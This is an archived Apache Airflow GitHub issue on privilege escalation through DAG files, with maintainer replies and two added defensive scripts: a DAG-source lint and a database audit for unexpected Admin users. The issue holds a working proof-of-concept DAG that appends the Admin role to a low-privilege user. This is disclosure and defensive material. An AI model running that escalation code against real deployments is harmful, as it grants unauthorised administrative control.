Posted to commits@airflow.apache.org by GitBox <gi...@apache.org> on 2021/09/30 16:44:35 UTC
[GitHub] [airflow] rssanders3 opened a new issue #18643: Users able to Update Roles through DAG Definition
rssanders3 opened a new issue #18643:
URL: https://github.com/apache/airflow/issues/18643
### Apache Airflow version
2.0.2
### Operating System
CentOS
### Versions of Apache Airflow Providers
N/A
### Deployment
Virtualenv installation
### Deployment details
Installation of Apache Airflow is running on Virtual Machines and configured with LDAP Authentication:
```
authenticate = True
auth_backend = airflow.contrib.auth.backends.ldap_auth
```
### What happened
While performing a security review of Apache Airflow, the Team appears to have discovered a security hole where users can update their own RBAC role or the roles of someone else on their team by using the Flask Appbuilder within a DAG definition.
### What you expected to happen
I would hope that users would not be able to update their Roles for security purposes.
### How to reproduce
1. Create a new user with limited permissions (in example username is "test-user")
2. Deploy the following DAG:
```
import airflow
import airflow.utils.dates  # make sure the submodule is loaded for days_ago()
from airflow.models import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.www.app import cached_app
from datetime import timedelta

# Top-level DAG-file code runs inside the DAG parser with Airflow's own
# metadata DB credentials, so nothing in RBAC stands between it and the
# Flask-AppBuilder security manager.
appbuilder = cached_app().appbuilder

# Look up the low-privilege user created in step 1.
user = appbuilder.sm.find_user(username='test-user')
print(user)
print(user.roles)

# Attach the Admin role to that user's role list (no-op if already present).
role = appbuilder.sm.find_role('Admin')
if role in user.roles:
    pass
else:
    user.roles.append(role)
# No explicit commit: as step 3 reports, the change is persisted anyway,
# because the webserver app binds FAB's session to Airflow's settings.Session,
# which the DAG-file processor commits after parsing.

default_args = {
    'owner': 'Airflow',
    'start_date': airflow.utils.dates.days_ago(1),
}
dag = DAG(
    dag_id='appbuilder-test',
    default_args=default_args,
    schedule_interval=None,
    dagrun_timeout=timedelta(60),
)
start_task = DummyOperator(task_id="start", dag=dag)
```
3. Open the Airflow Webserver as the Admin user and see that the "test-user" now has the "Admin" role assigned
### Anything else
Confirmed that this is an issue with other versions of Apache Airflow 2.x, including the latest stable release: 2.1.4.
### Are you willing to submit PR?
- [X] Yes I am willing to submit a PR!
### Code of Conduct
- [X] I agree to follow this project's [Code of Conduct](https://github.com/apache/airflow/blob/main/CODE_OF_CONDUCT.md)
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@airflow.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
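The proof of concept above works because top-level DAG code executes at parse time with Airflow's own database credentials, so the imports it needs (`airflow.www.app`, `appbuilder.sm`) are the thing to look for before a DAG file reaches the dags folder. As an added example, written for this page and not part of the issue or of Airflow itself, here is a pre-deployment lint that parses DAG source with Python's `ast` module and flags imports of the webserver app, the Flask-AppBuilder security manager or a raw metadata-DB session, plus attribute chains that read or change roles. The module watchlist, the `scan_dag_source`/`scan_dags_folder` names and the sample DAG strings are assumptions constructed for the example.

```python
"""Pre-deployment lint for Airflow DAG files.

Flags DAG source that imports the webserver app, the Flask-AppBuilder
security manager or a raw metadata-DB session, or that touches role
attributes at parse time. The module watchlist and the sample DAG sources
are assumptions constructed for this example.
"""
import ast
from pathlib import Path
from typing import Dict, List, Set, Tuple

Finding = Tuple[int, str]   # (line number, reason)

# Imports that hand DAG code the app, the security manager or a DB session.
SUSPICIOUS_MODULES = (
    "airflow.www",            # cached_app() -> app.appbuilder
    "airflow.settings",       # settings.Session: metadata DB session
    "airflow.utils.session",  # create_session() / provide_session
    "flask_appbuilder",
    "sqlalchemy",
)

# Attribute names that appear when roles are read or changed at runtime.
SUSPICIOUS_ATTRS = ("appbuilder", "sm", "find_role", "add_role", "roles")


def scan_dag_source(source: str, filename: str = "<dag>") -> List[Finding]:
    """Return sorted, de-duplicated findings for one DAG file's source text."""
    findings: Set[Finding] = set()
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.startswith(SUSPICIOUS_MODULES):
                    findings.add((node.lineno, f"import {alias.name}"))
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                # Catch both "from airflow.www.app import cached_app" and
                # "from airflow import settings" by checking the joined path.
                full = f"{node.module}.{alias.name}"
                if (node.module.startswith(SUSPICIOUS_MODULES)
                        or full.startswith(SUSPICIOUS_MODULES)):
                    findings.add((node.lineno,
                                  f"from {node.module} import {alias.name}"))
        elif isinstance(node, ast.Attribute) and node.attr in SUSPICIOUS_ATTRS:
            findings.add((node.lineno, f"attribute access .{node.attr}"))
    return sorted(findings)


def scan_dags_folder(folder: str) -> Dict[str, List[Finding]]:
    """Map each offending *.py file under `folder` to its findings."""
    report: Dict[str, List[Finding]] = {}
    for path in sorted(Path(folder).rglob("*.py")):
        found = scan_dag_source(path.read_text(encoding="utf-8"), str(path))
        if found:
            report[str(path)] = found
    return report


# Constructed sample: the shape of the proof of concept from this issue.
POC_DAG = '''
from airflow.models import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.www.app import cached_app

appbuilder = cached_app().appbuilder
user = appbuilder.sm.find_user(username="test-user")
user.roles.append(appbuilder.sm.find_role("Admin"))
dag = DAG(dag_id="appbuilder-test", schedule_interval=None)
DummyOperator(task_id="start", dag=dag)
'''

# Constructed sample: an ordinary DAG that should produce no findings.
CLEAN_DAG = '''
from datetime import timedelta
from airflow.models import DAG
from airflow.operators.bash import BashOperator

dag = DAG(dag_id="clean", schedule_interval=None,
          dagrun_timeout=timedelta(minutes=60))
BashOperator(task_id="hello", bash_command="echo hello", dag=dag)
'''


if __name__ == "__main__":
    for name, src in (("poc", POC_DAG), ("clean", CLEAN_DAG)):
        print(name, scan_dag_source(src, name) or "no findings")
```

Run `scan_dags_folder("/path/to/dags")` in CI or a pre-receive hook and fail the deployment on a non-empty report. This only catches the obvious path; a DAG author who can run arbitrary Python can reach the database through `importlib`, a subprocess, or credentials read from `airflow.cfg`, which is exactly the maintainers' point below. Treat the lint as hygiene and control who may commit to the dags folder.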
[GitHub] [airflow] mik-laj commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
mik-laj commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-931637131
See also: https://github.com/apache/airflow/issues/9342
[GitHub] [airflow] potiuk commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
potiuk commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-932976056
Yep. This is a feature of Airflow (in its current version): RBAC is just a UI concept, not a DAG concept, and it only prevents the UI users from doing stuff, not the DAG writers. Airflow does not have multi-tenancy yet, and while we are working in this direction, it will not be there for quite some time.
Also, thanks for reporting it in general, and while it is not a security issue but a feature of the project, in case in the future you have similar issues: PLEASE @rssanders3 DO NOT report issues related to security in public issues. This is non-responsible disclosure, and when you raise an issue where you even suspect that there might be a security issue, you should follow the Security Policies, which ask you to responsibly disclose it by sending an email to security@apache.org.
Here is our security policy https://github.com/apache/airflow/security/policy
and when you open a new issue it's pretty clearly linked to from the issue list:
![Screenshot from 2021-10-03 17-39-40](https://user-images.githubusercontent.com/595491/135761419-e04ec01a-2dc0-4923-a3d9-28522d677b9d.png)
[GitHub] [airflow] mik-laj closed issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
mik-laj closed issue #18643:
URL: https://github.com/apache/airflow/issues/18643
[GitHub] [airflow] boring-cyborg[bot] commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
boring-cyborg[bot] commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-931489465
Thanks for opening your first issue here! Be sure to follow the issue template!
[GitHub] [airflow] rssanders3 commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
rssanders3 commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-933751070
Hello @potiuk, sure, thank you for letting me know about this process. I will follow this one in the future and review the Issue options more closely. Thank you, Robert.
[GitHub] [airflow] mik-laj commented on issue #18643: Users able to Update Roles through DAG Definition
Posted by GitBox <gi...@apache.org>.
mik-laj commented on issue #18643:
URL: https://github.com/apache/airflow/issues/18643#issuecomment-931636341
[Project assumptions](https://github.com/apache/airflow/issues/10130) on Airflow security assume that the author of the DAG has free access to the database, so they also can mutate roles. Therefore, we cannot fix this bug. This requires a major architectural change to Airflow, so it must be preceded by a long discussion. As we are not able to do anything with this ticket yet, I close it.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: commits-unsubscribe@airflow.apache.org
For queries about this service, please contact Infrastructure at:
users@infra.apache.org
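The closing comment above states the threat model: whoever writes DAG files effectively holds the metadata database, so the compensating control is to detect role drift at the database rather than to prevent it in the DAG. As an added example, written for this page and not the project's own code, here is an audit that reads Flask-AppBuilder's `ab_user`, `ab_role` and `ab_user_role` tables (the real table names Airflow's RBAC uses) and reports any user holding Admin who is not on an expected allowlist. The in-memory SQLite database, its rows (including the escalated `test-user` from the proof of concept), the reduced column set and the `EXPECTED_ADMINS` allowlist are constructed for the example.

```python
"""Audit Flask-AppBuilder role membership for unexpected Admins.

Joins ab_user / ab_role / ab_user_role and reports users holding Admin who
are not on an expected allowlist. The SQLite schema subset, the rows and the
allowlist below are constructed for this example.
"""
import sqlite3
from typing import Dict, Set

ADMIN_ROLE = "Admin"

# Assumed baseline: the only accounts that are supposed to hold Admin.
EXPECTED_ADMINS: Set[str] = {"alice"}

# Subset of FAB's schema sufficient for the join; the real tables carry
# more columns (password, email, timestamps, ...).
SCHEMA = """
CREATE TABLE ab_user (id INTEGER PRIMARY KEY, username TEXT NOT NULL UNIQUE);
CREATE TABLE ab_role (id INTEGER PRIMARY KEY, name TEXT NOT NULL UNIQUE);
CREATE TABLE ab_user_role (
    id INTEGER PRIMARY KEY,
    user_id INTEGER NOT NULL REFERENCES ab_user(id),
    role_id INTEGER NOT NULL REFERENCES ab_role(id)
);
"""

# Plain SQL, so the same query runs unchanged against a Postgres or MySQL
# metadata database.
ROLE_QUERY = """
SELECT u.username, r.name
FROM ab_user_role AS ur
JOIN ab_user AS u ON u.id = ur.user_id
JOIN ab_role AS r ON r.id = ur.role_id
ORDER BY u.username, r.name
"""


def role_map(conn: sqlite3.Connection) -> Dict[str, Set[str]]:
    """username -> set of role names, read straight from the mapping table."""
    roles: Dict[str, Set[str]] = {}
    for username, role in conn.execute(ROLE_QUERY):
        roles.setdefault(username, set()).add(role)
    return roles


def unexpected_admins(conn: sqlite3.Connection,
                      expected: Set[str] = EXPECTED_ADMINS) -> Set[str]:
    """Users holding Admin who are not on the allowlist; empty means clean."""
    admins = {user for user, roles in role_map(conn).items()
              if ADMIN_ROLE in roles}
    return admins - set(expected)


def build_demo_db() -> sqlite3.Connection:
    """Constructed fixture: alice is a legitimate Admin; test-user was a
    Viewer until a DAG file appended Admin to its roles, as in the issue."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO ab_user (id, username) VALUES (?, ?)",
                     [(1, "alice"), (2, "test-user")])
    conn.executemany("INSERT INTO ab_role (id, name) VALUES (?, ?)",
                     [(1, ADMIN_ROLE), (2, "Viewer")])
    conn.executemany("INSERT INTO ab_user_role (user_id, role_id) VALUES (?, ?)",
                     [(1, 1), (2, 2), (2, 1)])   # (2, 1) is the escalation
    conn.commit()
    return conn


if __name__ == "__main__":
    drift = unexpected_admins(build_demo_db())
    print("unexpected Admins:", sorted(drift) or "none")
```

Point `ROLE_QUERY` at the real metadata database from a host and credential that DAG authors cannot reach, run it on a schedule, and alert on a non-empty result; `airflow users list` prints the same membership for a manual comparison. Because the DAG author can also rewrite `ab_user_role` back after use, keep the check frequent and compare against the allowlist rather than against the previous run.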